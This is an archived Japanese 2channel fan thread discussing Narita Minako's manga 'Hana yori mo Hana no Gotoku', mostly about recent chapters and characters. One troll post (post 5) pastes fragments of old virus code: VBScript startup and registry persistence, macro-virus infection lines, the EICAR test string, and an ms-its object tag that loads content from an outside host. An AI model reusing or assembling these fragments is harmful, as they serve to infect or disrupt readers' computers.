2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

「成田美名子・14」

1 :花と名無しさん:2006/12/27(水) 15:00:13 ID:yicZFxW80
月刊誌「メロディ」にて連載中の「花よりも花の如く」を中心に
成田作品についてマターリ語り合いましょう。

★関連スレ★
過去の作品について、より深く語りたい人はこちらへどうぞ。
成田美名子を語る SCENE 1 (懐かし漫画板)
http://comic6.2ch.net/test/read.cgi/rcomic/1136526073/

過去ログは>>2-3あたり

2 :花と名無しさん:2006/12/27(水) 15:01:16 ID:???0
★過去ログ★
「成田美名子」
http://choco.2ch.net/gcomic/kako/980/980532491.html
「成田美名子・2」
http://comic.2ch.net/test/read.cgi/gcomic/1003348663/
「成田美名子・3」
http://comic.2ch.net/gcomic/kako/1018/10183/1018366834.html
「成田美名子・4」
http://comic.2ch.net/test/read.cgi/gcomic/1038031864/
「成田美名子・5」
http://comic.2ch.net/test/read.cgi/gcomic/1059509614/
「成田美名子・6」
http://comic6.2ch.net/test/read.cgi/gcomic/1075741975/
「成田美名子・7」
http://comic6.2ch.net/test/read.cgi/gcomic/1090465890/
「成田美名子・8」
http://comic6.2ch.net/test/read.cgi/gcomic/1107886375/
成田美名子・9
http://comic6.2ch.net/test/read.cgi/gcomic/1125139493/
成田美名子・10
http://comic6.2ch.net/test/read.cgi/gcomic/1131410394/
成田美名子・11
http://comic6.2ch.net/test/read.cgi/gcomic/1136710674
「成田美名子・12」
http://comic6.2ch.net/test/read.cgi/gcomic/1140620365/
「成田美名子・13」
http://comic6.2ch.net/test/read.cgi/gcomic/1151165839/

3 :花と名無しさん:2006/12/27(水) 15:06:45 ID:???0
「花よりも花の如く」掲載のメロディ次号は、明日発売!

4 :花と名無しさん:2006/12/27(水) 15:10:44 ID:4f1ezyj00
>>1
スレ立て乙です。旦~

5 :<body onload=window()>:2006/12/27(水) 15:46:54 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :花と名無しさん:2006/12/27(水) 15:51:18 ID:???0
>>1
乙華麗!

7 :花と名無しさん:2006/12/28(木) 03:59:06 ID:???0
☆★☆ お願い ☆★☆

当スレは、定期的に荒らしの攻撃対象となっています。
荒れてきたなと思ったら、何も言わずに徹底的にスルーしましょう。
また、荒れてきたら自発的に[メール欄を空欄]にしてくださっても結構です。
ID出てない書き込みの挑発にはのらないようにしましょう。

8 :花と名無しさん:2006/12/28(木) 21:29:18 ID:???0
メロディ(12/28発売)2月号感想 ※※軽いネタバレ含むので注意※※




なんつーか…
ちょっと暗めな憲人の思考に疲れそう。
前々・前号と気を使うような、悪い意味でハラハラする内容に
うんざりしかかってた(能の公演とその話としては仕方ないけど)って言うか
今号ぐらいはフツーに楽しく公演や稽古する話があってもいいのになぁ。

折に触れ書いてきた兄弟(憲人・西門)の確執っぽいのが
また表面化してきたような…。双子ではないけれど、片方が養子に行ったと
言う点から、人間成長物語サイファ・シヴァの別バージョンでも
やる気なんだろうか?
「サイファ」は今でも好きなんだけど、もう散々描いたし、きちんと完結した
のだから、他の作品にも似たような問題を出さなくてもいいのに。

明るく舞台をこなして、楽ちゃんや直角と冗談を交わすってのは
やらないのかーーー…。期待しちゃいけないのかな(´・ω・`)


9 :花と名無しさん:2006/12/29(金) 15:29:28 ID:???0
花花でも西門との関係には何度か触れてきたし、今から改めてやんなくっても、とは思うよね。

たまには女の子が見たいです成田山。
憲ちゃんが恋愛できないならサイキ主役の番外編でもいいから。

10 :花と名無しさん:2006/12/29(金) 20:09:22 ID:N4WI+cT10
即死防止でage


11 :花と名無しさん:2006/12/30(土) 03:28:59 ID:???0
移転あったみたいですね

12 :花と名無しさん:2006/12/30(土) 04:12:04 ID:???0
4年半も経ったら、さすがに有塔さんは
もうどっか行っちゃっただろうな……

13 :花と名無しさん:2006/12/30(土) 22:45:01 ID:???O
有塔さんでもソラちゃんでも
ちらっとでも出てきていいと思うんだけどね

14 :花と名無しさん:2006/12/31(日) 00:10:47 ID:er6pjYCc0
移転して即死判定ゆるくなったのかな?
不安だからとりあえずage

15 :花と名無しさん:2006/12/31(日) 00:52:19 ID:???0
年末のこの忙しい時期に化粧板といいここといい
なんで移転するかな…。
レスだけ取得しといて正月三が日過ぎてから読むつもりだったのに…。

それはそうとけんちゃん暗いね。

16 :花と名無しさん:2006/12/31(日) 02:04:01 ID:???0
>>15
年末だから移転するんですけど?
移転しようがしまいが、レス取得はできるじゃないですか。
まさかいまどきIEで2ちゃん?

17 :花と名無しさん:2006/12/31(日) 09:49:00 ID:???0
今月、自分は面白かったよ。
養子の件、西門側からの話は以前あったから、
憲人側からのエピが楽しみだ。

対になってる話のふたつ目なパターンとか
憲ちゃん悩む→能の御題をクリアしつつ成長するパターンが
花花の様式美でもある反面、
最後は丸く収まるのがわかってて
このふたりどうなっちゃうんだろ的ドキドキ感が不足してるのが
ちょっぴり物足りないとは思うけど。

ナチュ最終巻が休暇中に発掘できたら
西門エピもおさらいしておきたい。

18 :17:2006/12/31(日) 09:54:08 ID:???0
で、養子に西門が選ばれた理由予想とかしてみてる。

1 憲ちゃんの方がよりお能好きな子供だった
2 憲ちゃんはお能意外にとりえがない子供だった
3 憲ちゃんは神主さんをこなせなさそうな不器用な子供だった
4 憲ちゃんは兼業必須なのに手に職をつけるのは無理そうな子供だった

…憲ちゃんダメ子供ばかり浮かんでくるw
ごめんよ。

19 :花と名無しさん:2006/12/31(日) 10:45:40 ID:???0
普通に次男だからだろう

20 :花と名無しさん:2006/12/31(日) 12:10:41 ID:???0
旧家・名家で長男を養子に出す家は無いでしょ。
9代目松本幸四郎と2代目中村吉右衛門だって、
次男坊の吉右衛門さんが養子に行ってるわけだし

21 :花と名無しさん:2006/12/31(日) 16:45:25 ID:???0
今月号もう読んでる?

今まで長男・次男だからって思ってたのが、
ふとした会話から
左右先生が当時どちらを養子に出すか相当迷ってたと聞いて…
って引きだったんだよ。

22 :花と名無しさん:2006/12/31(日) 19:55:01 ID:???0
>>21
19-20じゃなく今月もう読んだけど、結果的に19-20のような理由も
養子に出す理由として選ばれたような希ガス。
+1かな。お母さんが憲ちゃんは病気でもお稽古熱心だったという
エピを暴露してたような覚えがあるので。

23 : 株価【36】 :2007/01/02(火) 10:48:34 ID:???O
あけおめことよろ!
年間2回ぐらいは、明るいエピが読めますように....。

24 :花と名無しさん:2007/01/04(木) 02:03:01 ID:???0
>>16
>>15です。亀でごめんね。
あれいらいやっとネットできるもんだから。
一応かちゅは入れてあるしもちろんレス取得も出来るんだけど、
レス取得する暇も惜しいくらい忙しいのに鯖移転で取得しなおし、
鯖移動に対応してないから今までずっと追って見てた
作家さんやらなんやらのスレを探しなおしになるんだ。
年末だから移転ってのは分かったうえでの、こっちの愚痴です、ただの。

>>22
あったよね、そのお母さん談のエピソード。
長男+お稽古(お舞台)好きがポイントだと思って納得もしてたし、
そのことでホッとしちゃったという罪悪感も感じてたのが、
やっと弟に素直に接することが出来る
&自分の能の社会や文化立ち位置・姿勢も漠然と見えてきた、
というところ(たぶんナチュラル番外〜今までのお話)に、
今回、足元からその能役者として育った立場という土台を
ぐらつかせるような一言に「納得していた」はずのものや
「消化した」と思っていたものがあふれたんだろうか?と読んだよ。

25 :花と名無しさん:2007/01/04(木) 06:00:58 ID:???0
>>24
鯖移転が珍しかった時期に作られたかちゅ〜しゃでは
多少不便するのは仕方ないと思うんです。
どんなにかちゅ〜しゃに思い入れがあるかは分かりませんが
他の専ブラ使うと、かちゅ〜しゃのログ取得の遅さに気付いて
空いた口が塞がらなくなりますよ。

それと、愚痴はチラシの裏にでも書いた方がいいかと思います。
公共の掲示板に愚痴を書いて、他人に無理やり読ませるのは
趣味が良いとは言えませんし。

26 :花と名無しさん:2007/01/06(土) 00:49:17 ID:???O
神主さんが美容師を兼業するって許されるの?
お寺の住職さんが、教師を兼業してるってのはよく聞くけど。
お寺と神社では違うのかもしれないけど、美容師やってる神主さんてなんかヤダ・・・

27 :花と名無しさん:2007/01/06(土) 01:11:30 ID:???0
>>26
僧侶も神職も、兼業は珍しいことではない。
が、髪は神に通ずるという話は漫画の中だけではないので
神職で理美容師は居ないかもしれない。

28 :花と名無しさん:2007/01/06(土) 09:21:55 ID:???0
専業で食える僧侶も神職も少数派

29 :花と名無しさん:2007/01/06(土) 11:53:29 ID:???0
神社で饂飩屋さんをやっているところがあるよ〜っと、香川県人が呟いてみる。
息子さんが何年も修行した本格派だ。
神社の脇にある蔵を改造している。
年末年始とか、お祭りの期間とか、神社が忙しいときは何日も休業していますwww

30 :26:2007/01/06(土) 14:31:40 ID:???O
兼業するのは、全く抵抗はないのだけど。
何も美容師を選ばなくてもいいのではないかとオモタ。
>>27の「髪は神」ての見たらなおさらそう思う様になったよ。
西門の髪フェチは知ってるけど、髪=神を切るのはどうもなあ。
青森の家族は反対しないのかしら。

31 :花と名無しさん:2007/01/06(土) 15:21:28 ID:???0
西門の場合は今は普通に同居している母親の風呂で髪を洗うシーンからマザコン
であり髪フェチへの道を歩み始めた訳だし、どちらかといえば髪を愛でるという
意味と大切に扱うという意味を持っている訳だから、髪=神でいえば、設定の違
和感は感じられなかった。
青森の親達も髪を愛で、大切に扱う彼の姿勢は否定しないだろう。

俺が最も好きな成田美名子の描いたシーンの一つだな。西門とおかぁさんの風呂
のシーン。
ナイスな太さの太股。やせ過ぎてもいないスタイル。おかぁさま、最高です。
あの体形が崩れていないのなら、ローライズジーンズを履かせてやりたい。

32 :花と名無しさん:2007/01/07(日) 15:44:14 ID:???0
伊坂幸太郎の小説「砂漠」を読んで、ナチュラルにちょっとだけかぶった。
作者に対して、ふーんその学生集団の構成でおもしろいとおもってんのか、とか、
そういう会話をどういうスタンスでかいてるのか、とか若干疑問に思うところとか
必然性があるようなないような、の超能力者の登場人物とか、
派手な事件に巻き込まれて、でも受け入れて立ち上がる登場人物とか
セックスとかそういうのはあえて描かずに淡々と流すとか

読んでる自分はまあ、そういうの好きなんだけど。
伊坂スレで、砂漠はいまいちおもしろくない人に勧められないっての多かった。

33 :花と名無しさん:2007/01/09(火) 19:46:33 ID:???O
この人の漫画は淡々としすぎてるような
味なのかもしれないけど


34 :花と名無しさん:2007/01/12(金) 10:19:14 ID:???0
雑誌ではドロドロしてて重かった話も
コミクスで一気読みすると淡々とした感じに…。
自分にとってサイファがそうだった。

35 :コミック派:2007/01/17(水) 20:41:07 ID:???0
いま連載どうなってるの?
5巻はいつ?

36 :花と名無しさん:2007/01/18(木) 04:19:10 ID:???0
>>35
ググれば、白癬系の掲載情報をページ数や副題など
詳しく掲載してるサイトがあるよ。
個人サイトなんで正確な名前は伏せるが「コミック・○ームズ」
最新12/28発売メロ(2月号)で、累積180ページ未満だから
たぶんコミクス発売はまだだろう。

参考:2月新刊↓URLを変更すれば3月、4月も簡単にチェックできる。
ttp://www.hakusensha.co.jp/shopping/sinkan/2007_02.html

37 :花と名無しさん:2007/01/18(木) 11:31:37 ID:???O
周防監督の痴漢冤罪映画見た人いる?宣伝見て花花思い出しちゃった。
でもあの回はなんかすっきりしなくていやだったなあ。

38 :花と名無しさん:2007/01/19(金) 00:19:32 ID:???0
>>37
金払ってまで見る価値がある映画なのか微妙だと思ってる
何年後かにテレビで放送するだろうけど、そのときも見るかどうか微妙

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)